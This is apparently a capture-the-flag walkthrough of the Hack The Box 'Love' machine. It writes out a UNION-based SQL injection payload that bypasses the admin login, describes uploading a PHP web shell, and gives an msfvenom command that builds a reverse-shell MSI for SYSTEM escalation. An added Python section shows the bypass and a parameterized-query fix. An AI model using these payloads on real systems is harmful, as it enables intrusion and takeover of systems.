HTB: Love

...

Intro:

So. This was a fun box. It took me a hot second to solve due to me getting tunnel-vision over the login page, but this hyperfixation ended up being part of the solution!

SPOILER ALERT: I found an SQL injection which was probably not the intended solution (especially compared to all the other solutions out there).

Recon:

As always we do nmap -sT -sV -v <ip> to find open ports. This shows us quite a few, but we notice a web server, which we'll check out.

Before we start snooping around in the browser, we can start gobuster to check for directories: gobuster dir -u <ip> -w <path/to/dict/>.

Exploration:

We are presented with a voting page. For what? We will never know. Anyways, we can start looking around, trying to determine if the site is using a CMS or has some version of anything displayed. Nothing. So we go back to the login page and try some arbitrary values (namely '0'). All of them show the same error: Voter ID not found.

Next, we try some good ol' SQL injection: 0'OR '1'='1. To our surprise we get an "Incorrect password" error! This means the page is vulnerable to an SQL injection! What exactly the injection is, I'm not sure, but after a very looong session of trial and many errors, we realize the page title is quite specific: "Voting System in PHP". I then get the genius idea to check Exploit DB for an SQL injection against "Voting System in PHP". We're pleasantly presented with a couple of results, one of which is exactly what we're looking for! [1]

Hacking the Login:

Checking the gobuster results yields us the admin login page, which looks exactly like the voter login page. Using our PoC injection from before, we see that this page is also vulnerable. We can then read the newly discovered exploit's how-to and use Burp Suite to relay the info we need. Something I've found is that the "login" value should be empty. I also change the password to "passie" and replace the bcrypt string with the appropriate value. This is the full payload:

password=passie&username=notadmin' UNION SELECT 1,2,"$2a$12$TkzTU9cx01SFg9efTzbkJea8QzdMebNJTVyPYEvOESXGFYLSr1xEO",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -&login=""

Once we POST this payload to the login page we're greeted with the admin home page.
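To see why the payload above works and what stops it, here is an added, constructed Python/sqlite3 model of the admin login (not the post's or the Voting System's own code): the UNION appends a row whose password column the attacker chose, and the server then verifies the supplied password against that supplied hash, while a parameterized query binds the whole username as data. The seven-column table, its column names and sha256 standing in for bcrypt are assumptions.

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-in for the app's admin table. The post doesn't show the
# real schema; seven columns match the seven values in the UNION payload.
# sha256 stands in for bcrypt (which is not in the standard library).
SCHEMA = ("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT,"
          " c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT)")


def hash_pw(pw: str) -> str:
    return hashlib.sha256(pw.encode()).hexdigest()


def verify_pw(pw: str, stored: str) -> bool:
    return hmac.compare_digest(hash_pw(pw), stored)


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute("INSERT INTO admin VALUES (1, 'admin', ?, '', '', '', '')",
               (hash_pw("real-admin-secret"),))
    return db


def login_vulnerable(db, username: str, password: str) -> bool:
    # String concatenation: the username is parsed as SQL, so a UNION can
    # append a row whose password column the attacker chose. The server then
    # faithfully verifies the given password against the given hash.
    sql = f"SELECT * FROM admin WHERE username = '{username}'"
    row = db.execute(sql).fetchone()
    return row is not None and verify_pw(password, row[2])


def login_hardened(db, username: str, password: str) -> bool:
    # Parameterized query: the whole username is bound as one string value,
    # so quotes and UNION inside it never reach the SQL parser.
    sql = "SELECT * FROM admin WHERE username = ?"
    row = db.execute(sql, (username,)).fetchone()
    return row is not None and verify_pw(password, row[2])


# Same shape as the post's payload, with the stand-in hash of "passie" in
# the password column; the trailing comment swallows the closing quote.
PAYLOAD = ("notadmin' UNION SELECT 1,2,'" + hash_pw("passie")
           + "',4,5,6,7 -- -")
```

The same defence applies to the voter login: once the lookup is parameterized, the 0'OR '1'='1 probe is just a username that does not exist.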

Admin page

Uploading Pictu- Files:

As we look around the page we come across a tab: "Voters". Within this tab we're able to create a new voter, which we name "Hacker Mike". We can also upload a picture. Hmm..... Through our malicious ideologies, we try uploading a PHP file, which doesn't throw any errors. By using Inspect Element we can see that the directory these "pictures" are stored in is "/images". We check and TADA! Our file is there!

Creating a new voter while uploading a PHP reverse shell

Getting User:

We can directly access our file, which gives us a web shell, with the GET key being "miked". Web shells are kinda crappy though. We can get a reverse shell going with a PowerShell one-liner [2]. Once we have a better shell we can comfortably find the flag file at "C:\Users\Phoebe\Desktop\user.txt".

Location of user.txt file (No spoilers!)

Getting Root:

With user out of the way, we move on to root! We can upload winPEAS to the server the same way we did our PHP web shell, or we can pull it down using Invoke-WebRequest. Whichever tickles your fancy, we should now be able to execute winPEAS. What I've done is send the output to a file so I can pull it down to my machine for analysis (the output exceeds the max lines of my terminal, so I'd miss a lot of it otherwise). To read this file we need to use "more", which understands ANSI colour codes.

Looking through the report we find that both "AlwaysInstallElevated" registry keys (HKLM and HKCU) are set to 1. This means we can "install" any .msi file as NT AUTHORITY\SYSTEM. We can generate a reverse shell using msfvenom: msfvenom -p windows/meterpreter/reverse_tcp -f msi lhost=<ip> lport=3188 > hacked.msi. As much as I hate using meterpreter, I've not had luck using a generic shell.

Once we establish the shell we can verify our godly status with whoami, which returns an exciting "nt authority\system"! We can then find the root flag at "C:\Users\Administrator\Desktop\root.txt"! Bam! We've successfully owned the Love box!

whoami plus location of root.txt (No spoilers!)

Resources:

[1] Exploit DB SQL Injection [EXTERNAL]

[2] PowerShell One-Liner


Last Edit: 2021.08.20